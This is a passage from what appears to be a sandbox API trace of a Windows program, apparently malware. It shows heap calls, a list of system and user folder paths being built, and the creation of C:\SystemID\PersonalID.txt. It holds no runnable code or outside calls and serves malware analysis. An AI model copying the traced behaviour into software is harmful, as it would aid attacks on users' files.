(HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x818) returned 0x32d1960 [0076.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x33621e8 [0076.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82c) returned 0x3362a10 [0076.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3362a10, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3363248 [0076.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3362a10 | out: hHeap=0x630000) returned 1 [0076.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c8) returned 0x32cc4b8 [0076.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0ca0 | out: hHeap=0x630000) returned 1 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3362a10 [0076.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3362a10, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0076.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3363a80 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3362a10 | out: hHeap=0x630000) returned 1 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x826) returned 0x3362a10 [0076.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3362a10, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x33642b8 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3362a10 | out: hHeap=0x630000) returned 1 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x822) returned 0x3362a10 [0076.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3362a10, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x3364af0 [0076.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3362a10 | out: hHeap=0x630000) returned 1 [0076.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x834) returned 0x3365328 [0076.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3365328, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0076.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x3365b68 [0076.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3365328 | out: hHeap=0x630000) returned 1 [0076.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81e) returned 0x3362a10 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x3362a10, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3365328 [0076.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3362a10 | out: hHeap=0x630000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x818) returned 0x32d1960 [0076.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3362a10 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2a0) returned 0x3321b18 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc4b8 | out: hHeap=0x630000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x83a) returned 0x33663b0 [0076.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x33663b0, cchWideChar=1053 | out: lpWideCharStr="C:\\System Volume Information\\") returned 30 [0076.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x3366bf8 [0076.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33663b0 | out: hHeap=0x630000) returned 1 [0076.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x848) returned 0x3367440 [0076.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3332e18, cbMultiByte=-1, lpWideCharStr=0x3367440, cchWideChar=1060 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Roaming\\") returned 37 [0076.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x3367c90 [0076.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367440 | out: hHeap=0x630000) returned 1 [0076.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc76) returned 0x33684e8 [0076.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c90 | out: hHeap=0x630000) returned 1 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x844) returned 0x3369168 [0076.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3332e18, cbMultiByte=-1, lpWideCharStr=0x3369168, cchWideChar=1058 | out: lpWideCharStr="C:\\Users\\%username%\\AppData\\Local\\") returned 35 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x850) returned 0x3367440 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3369168 | out: hHeap=0x630000) returned 1 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc76) returned 0x3369168 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367440 | out: hHeap=0x630000) returned 1 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x816) returned 0x32d1960 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1035 | out: lpWideCharStr="C:\\Windows\\") returned 12 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x33663b0 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x818) returned 0x32d1960 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1036 | out: lpWideCharStr="C:\\PerfLogs\\") returned 13 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3367440 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x832) returned 0x3367c68 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3367c68, cchWideChar=1049 | out: lpWideCharStr="C:\\ProgramData\\Microsoft\\") returned 26 [0076.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x3369de8 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c68 | out: hHeap=0x630000) returned 1 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x83a) returned 0x3367c68 [0076.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3367c68, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x336a630 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c68 | out: hHeap=0x630000) returned 1 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.759] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3367c68 [0076.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3367c68, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0076.760] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x336ae78 [0076.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c68 | out: hHeap=0x630000) returned 1 [0076.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3367c68 [0076.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3367c68, cchWideChar=1040 | out: lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x336b6b0 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c68 | out: hHeap=0x630000) returned 1 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3f0) returned 0x32cadc0 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3321b18 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3367c68 [0076.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x3367c68, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x336bee8 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3367c68 | out: hHeap=0x630000) returned 1 [0076.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.761] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x32d1960 [0076.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x3367c68 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x812) returned 0x32d1960 [0076.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1033 | out: lpWideCharStr="C:\\Intel\\") returned 10 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x336c720 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x818) returned 0x32d1960 [0076.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dec0, cbMultiByte=-1, lpWideCharStr=0x32d1960, cchWideChar=1036 | out: lpWideCharStr="C:\\MSOCache\\") returned 13 [0076.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x336cf48 [0076.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d1960 | out: hHeap=0x630000) returned 1 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x822) returned 0x336d770 [0076.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x336d770, cchWideChar=1041 | out: lpWideCharStr="C:\\Program Files\\") returned 18 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x336dfa0 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x336d770 | out: hHeap=0x630000) returned 1 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3332e18 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3332e18 | out: hHeap=0x630000) returned 1 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f7f8 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82e) returned 0x336e7d8 [0076.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x332f7f8, cbMultiByte=-1, lpWideCharStr=0x336e7d8, cchWideChar=1047 | out: lpWideCharStr="C:\\Program Files (x86)\\") returned 24 [0076.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x336f010 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x336e7d8 | out: hHeap=0x630000) returned 1 [0076.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f7f8 | out: hHeap=0x630000) returned 1 [0076.766] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dc28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.766] GetLastError () returned 0x3 [0076.766] GetLastError () returned 0x3 [0076.766] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0076.767] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18dc28, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, 